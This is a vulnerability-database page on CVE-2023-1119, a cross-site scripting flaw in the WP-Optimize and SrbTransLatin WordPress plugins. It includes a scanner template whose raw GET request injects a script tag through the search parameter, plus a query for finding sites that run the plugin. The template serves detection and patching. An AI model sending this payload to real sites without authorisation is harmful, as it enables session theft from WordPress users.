| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2023-1119 | 10 Jul 202320:23 | – | circl | |
| WordPress plugin WP-Optimize 跨站脚本漏洞 | 28 May 202300:00 | – | cnnvd | |
| CVE-2023-1119 | 10 Jul 202312:40 | – | cve | |
| CVE-2023-1119 Multiple Plugins - Cross-Site Scripting From Third-party Library | 10 Jul 202312:40 | – | cvelist | |
| CVE-2023-1119 | 10 Jul 202316:15 | – | nvd | |
| WordPress WP-Optimize Plugin < 3.2.13 XSS Vulnerability | 12 Jul 202300:00 | – | openvas | |
| CVE-2023-1119 | 10 Jul 202316:15 | – | osv | |
| WordPress WP-Optimize Plugin < 3.2.13 is vulnerable to Cross Site Scripting (XSS) | 4 Jul 202300:00 | – | patchstack | |
| Cross site scripting | 10 Jul 202316:15 | – | prion | |
| PT-2023-16768 · WordPress · Wp-Optimize +1 | 10 Jul 202300:00 | – | ptsecurity |
| Source | Link |
|---|---|
| wpscan | www.wpscan.com/vulnerability/1119 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2023-1119 |
id: CVE-2023-1119
info:
name: WP-Optimize WordPress plugin < 3.2.13 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The WP-Optimize WordPress plugin before 3.2.13 and SrbTransLatin WordPress plugin before 2.4.1 are vulnerable to cross-site scripting due to a third-party library that improperly handles HTML character escaping.
impact: |
Unauthenticated attackers can inject malicious JavaScript through search parameters due to improper HTML character escaping in a third-party library, enabling theft of WordPress user session cookies.
remediation: Users are recommended to upgrade WP-Optimize to version 3.2.13 and SrbTransLatin to version 2.4.1 to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/1119
- https://nvd.nist.gov/vuln/detail/CVE-2023-1119
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1119
cwe-id: CWE-79
epss-score: 0.01099
epss-percentile: 0.61663
cpe: cpe:2.3:a:wp-optimize:wp-optimize:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wordpress
product: wp-optimize,srbtranslatin
fofa-query: body="/wp-content/plugins/wp-optimize"
tags: cve,cve2023,wp,wp-plugin,wordpress,wp-optimize,xss,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: word
part: body
words:
- "/wp-content/plugins/wp-optimize"
internal: true
- raw:
- |
GET /?s=<%2Fscript><script>alert%28document.domain%29<%2Fscript> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- "Search"
condition: and
- type: word
part: body
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a004830460221009bf87d3f26eedacea48a610ae3a8082deda7dfea9bf25b8df25ea9106ff82dcd022100a26b6288c8b151f4bd3c2e62b45420e152c962bfc36de7478cdf7c94d7ef4ff8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation